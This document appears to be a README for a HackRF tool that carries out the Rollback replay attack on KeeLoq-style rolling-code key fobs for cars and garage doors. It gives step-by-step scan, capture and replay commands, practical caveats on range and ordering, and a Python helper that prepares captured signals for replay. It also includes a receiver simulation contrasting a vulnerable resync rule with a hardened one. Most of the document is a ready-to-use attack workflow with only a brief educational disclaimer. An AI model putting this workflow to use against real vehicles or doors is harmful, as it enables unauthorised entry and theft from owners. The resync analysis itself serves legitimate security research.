A demonstration of the Rollback attack against rolling code systems (KeeLoq and similar) used in car key fobs and garage door openers at 315 MHz and 433.92 MHz.
Unlike RollJam, which has to jam the receiver while it captures a code, Rollback is purely passive: capture a few consecutive codes, wait, then replay them in the original order. Nothing interferes with the target during capture.
Step 1: SCAN. hackrf_sweep finds the carrier frequency (315 MHz or 433.92 MHz band).
Step 2: CAPTURE. Record 3-5 consecutive key presses (passive, no jamming). Each press is saved as a separate raw IQ file.
Step 3: WAIT. The owner uses the car/door normally, advancing the counter (e.g., from #101 to #153).
Step 4: REPLAY. Transmit the captured signals in their exact original order:
  Signal #101: receiver ignores it (old code, behind the current counter)
  Signal #102: receiver sees a consecutive sequence forming
  Signal #103: ROLLBACK triggered; the receiver resyncs its counter to #103
Step 5: ACCESS. The receiver's counter has been rolled back, so signal #103 is accepted as valid and the door opens.
Rolling code receivers have a resynchronization window: a code ahead of the current counter is accepted directly, and if the receiver hears N consecutive sequential codes outside that window (even ones older than its counter) it assumes the remote was reset or pressed many times out of range and moves its internal counter to match. This is the design flaw Rollback exploits in KeeLoq and similar systems: the receiver prioritizes usability (re-pairing a reset remote without a visit to the dealer) over security, because it never checks that the resync moves the counter forward.
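To make the resync behaviour concrete, here is an added simulation (not code from rollback.py or from any real receiver firmware) of a rolling-code receiver with a forward acceptance window and a resync rule, in the vulnerable form described above and in a hardened variant that only ever resyncs forward. The window size (16), the resync count (3), the counter values and the "door opens on resync" behaviour are assumptions chosen to mirror the walkthrough.

```python
"""Rolling-code receiver model with a resync window, and the Rollback replay
against it. Added example; the window size, resync count and counters are
assumed for illustration, not taken from any specific product."""

from dataclasses import dataclass, field
from typing import List

WINDOW = 16      # assumed: codes up to 16 ahead of the last accepted one are valid
RESYNC_N = 3     # assumed: 3 consecutive sequential codes trigger a resync


@dataclass
class Receiver:
    counter: int                          # last accepted counter value
    window: int = WINDOW
    resync_n: int = RESYNC_N
    allow_backward_resync: bool = True    # True = vulnerable, False = hardened
    pending: List[int] = field(default_factory=list)
    log: List[str] = field(default_factory=list)

    def receive(self, ctr: int) -> str:
        """Process one received counter value; the return value is the action taken."""
        # Normal case: code inside the forward window -> accept and advance.
        if self.counter < ctr <= self.counter + self.window:
            self.counter = ctr
            self.pending.clear()
            return self._note(ctr, "accepted")
        # Outside the window: track whether a run of sequential codes is forming.
        if self.pending and ctr == self.pending[-1] + 1:
            self.pending.append(ctr)
        else:
            self.pending = [ctr]
        if len(self.pending) < self.resync_n:
            return self._note(ctr, "ignored")
        # Resync condition met. The hardened receiver refuses to move backwards.
        if ctr <= self.counter and not self.allow_backward_resync:
            self.pending.clear()
            return self._note(ctr, "rejected (resync only moves forward)")
        self.counter = ctr                # vulnerable: counter rolled back, door opens
        self.pending.clear()
        return self._note(ctr, "resync")

    def _note(self, ctr: int, result: str) -> str:
        self.log.append(f"#{ctr}: {result} (counter now {self.counter})")
        return result


def simulate(allow_backward: bool):
    """Run Steps 2-4 against a receiver and return (final counter, replay results, log)."""
    fob = 100                                   # fob counter before the capture
    rx = Receiver(counter=fob, allow_backward_resync=allow_backward)
    captured = []
    for _ in range(3):                          # Step 2: three consecutive presses recorded
        fob += 1
        captured.append(fob)
        rx.receive(fob)
    for _ in range(50):                         # Step 3: owner keeps using the fob (#104..#153)
        fob += 1
        rx.receive(fob)
    results = [rx.receive(c) for c in captured]  # Step 4: replay in original order
    return rx.counter, results, rx.log


def main():
    for hardened in (False, True):
        counter, results, _ = simulate(allow_backward=not hardened)
        label = "hardened" if hardened else "vulnerable"
        print(f"{label} receiver: replay -> {results}, counter now #{counter}")


if __name__ == "__main__":
    main()
```

Against the vulnerable receiver the three replayed codes produce ignored, ignored, resync and the counter drops from #153 back to #103; the hardened receiver rejects the third code and stays at #153. Note that the hardened rule still lets a legitimately reset remote resync, as long as its counter is ahead of the receiver's.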
- HackRF One: captures (RX) and replays (TX) signals
- No Evil Crow, no Flipper, no jamming device needed
- Python 3, numpy
- hackrf_sweep (for frequency scanning)
- hackrf_transfer (for IQ capture and replay)
- Optional: URH (Universal Radio Hacker) for visual signal analysis
```bash
# Step 1: Find the frequency
python3 rollback.py scan --band 315
python3 rollback.py scan --band 433

# Step 2: Capture 3-5 consecutive key presses
python3 rollback.py capture --freq 315.07 --count 5

# Step 3: Wait (owner uses car normally)

# Step 4: Replay in order
python3 rollback.py replay --session latest

# Analyze captured signals
python3 rollback.py analyze --session latest
```

```
rollback-attack/
├── rollback.py          # Main tool (scan/capture/replay/analyze)
├── requirements.txt     # Python dependencies
├── README.md            # This file
└── captures/            # Stored capture sessions
    └── session_YYYYMMDD_HHMMSS/
        ├── metadata.json    # Frequency, sample rate, signal list
        ├── signal_001.iq    # Raw IQ for first key press
        ├── signal_002.iq    # Raw IQ for second key press
        └── signal_003.iq    # Raw IQ for third key press
```
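The replay step only works if the session is replayed as a gapless, ordered run of presses, and a capture file that recorded nothing but noise breaks the run. The following added example (not rollback.py's own code) loads a session laid out as in the tree above, orders the signal files, refuses a session with a gap in the press indices or an empty capture, and returns the replay plan. The metadata.json keys (freq_hz, sample_rate, signals) are an assumed schema, since the page does not spell them out; the raw IQ layout (interleaved signed 8-bit I,Q as written by hackrf_transfer -r) is real.

```python
"""Ordered replay plan for a capture session. Added example, not rollback.py's
own code; the metadata.json keys are an assumed schema. Pure stdlib so it
runs without numpy."""

import json
import struct
import tempfile
from pathlib import Path


def load_iq_int8(path):
    """hackrf_transfer -r writes interleaved signed 8-bit I,Q pairs; return complex samples."""
    raw = path.read_bytes()
    n = len(raw) // 2
    ints = struct.unpack(f"{2 * n}b", raw[: 2 * n])
    return [complex(ints[2 * i], ints[2 * i + 1]) for i in range(n)]


def mean_power(samples):
    return sum(abs(s) ** 2 for s in samples) / max(len(samples), 1)


def signal_index(path):
    return int(path.stem.split("_")[1])        # signal_007.iq -> 7


def replay_plan(session_dir, noise_floor=50.0):
    """Return (freq_hz, sample_rate, [(file, mean_power), ...]) in replay order.

    Raises ValueError if the press indices have a gap (a missed press between
    captures) or if a file holds no burst above the assumed noise floor."""
    session_dir = Path(session_dir)
    meta = json.loads((session_dir / "metadata.json").read_text())
    files = sorted(session_dir.glob("signal_*.iq"), key=signal_index)
    idx = [signal_index(p) for p in files]
    if not idx or idx != list(range(idx[0], idx[0] + len(idx))):
        raise ValueError(f"capture indices are not contiguous: {idx}")
    plan = []
    for p in files:
        power = mean_power(load_iq_int8(p))
        if power < noise_floor:
            raise ValueError(f"{p.name}: no burst above the noise floor")
        plan.append((p.name, power))
    return meta["freq_hz"], meta["sample_rate"], plan


def build_demo_session(root, indices, blank=()):
    """Constructed sample session: one OOK-style burst per press (I=100 then silence)."""
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)
    burst = bytes([100, 0] * 200 + [0, 0] * 200)     # 200 "on" samples, 200 "off"
    silence = bytes([0, 0] * 400)                     # a capture that missed the press
    for i in indices:
        (root / f"signal_{i:03d}.iq").write_bytes(silence if i in blank else burst)
    meta = {"freq_hz": 315070000, "sample_rate": 2000000,   # assumed schema
            "signals": [f"signal_{i:03d}.iq" for i in indices]}
    (root / "metadata.json").write_text(json.dumps(meta))
    return root


def demo():
    """Good session: three consecutive presses, all with a burst."""
    with tempfile.TemporaryDirectory() as tmp:
        return replay_plan(build_demo_session(tmp, (1, 2, 3)))


def demo_gap_rejected():
    """Session with a missed press (indices 1, 2, 4) must be refused."""
    with tempfile.TemporaryDirectory() as tmp:
        try:
            replay_plan(build_demo_session(tmp, (1, 2, 4)))
        except ValueError:
            return True
    return False


if __name__ == "__main__":
    freq, rate, plan = demo()
    print(f"replay at {freq} Hz, {rate} S/s, in order: {[name for name, _ in plan]}")
    print("gap rejected:", demo_gap_rejected())
```

Each entry of the returned plan is one file to hand to hackrf_transfer -t, in that order, with the session's frequency and sample rate passed as -f and -s; the contiguity check is what enforces the "no missed presses, replay in exact order" caveats below.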
- This is for educational/research purposes on equipment you own
- Rollback does NOT work on all rolling code systems — some have been patched
- The number of signals needed (3-5) depends on the receiver's resync window
- Signals must be captured consecutively (no missed presses between them)
- Replay must be in exact chronological order
- HackRF TX power is low (~10 dBm), so the HackRF must be close to the receiver for the replay to be heard